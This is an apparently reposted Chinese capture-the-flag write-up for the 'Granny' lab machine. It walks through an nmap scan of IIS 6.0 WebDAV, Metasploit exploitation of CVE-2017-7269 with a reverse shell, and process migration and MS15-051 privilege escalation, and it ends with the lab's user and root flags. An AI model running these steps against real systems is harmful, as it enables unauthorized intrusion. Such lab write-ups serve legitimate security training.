[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升

本文主要是介绍[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

信息收集

IP Address	Opening Ports
10.10.10.15	TCP:80

$ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Server Date: Thu, 22 Aug 2024 07:28:25 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

IIS 6.0 & CVE-2017-7269 & BOF

$ msfconsole

msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.16.24

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

meterpreter > bg

权限提升 & MS15-051

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1

msf6 post(multi/recon/local_exploit_suggester) > run

但是你如果尝试执行权限提升会出现错误

为了确保稳定，进程迁移到davcdata.exe

meterpreter > migrate 2732

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image

msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.16.24

msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1

msf6 exploit(windows/local/ms15_051_client_copy_image) > run

User.txt

700c5dc163014e22b3e408f8703f67d1

Root.txt

aa4beed1c0584445ab463a6747bd06e9

这篇关于[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---